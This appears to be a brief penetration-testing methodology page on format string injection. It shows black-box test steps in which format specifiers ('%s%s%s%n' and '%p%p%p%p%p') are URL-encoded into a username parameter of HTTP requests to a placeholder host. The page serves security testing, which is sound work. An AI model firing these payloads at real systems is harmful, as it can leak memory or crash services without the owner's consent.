Format String Injection
Check List
Methodology
Black Box
Format string attack
1
GET /userinfo?username=unk9vvn HTTP/1.1
Host: target.com2
%s%s%s%n3
GET /userinfo?username=%25s%25s%25s%25n HTTP/1.1
Host: target.com4
%p%p%p%p%p5
GET /userinfo?username=%25p%25p%25p%25p%25p HTTP/1.1
Host: target.com6
White Box
Cheat Sheet
Last updated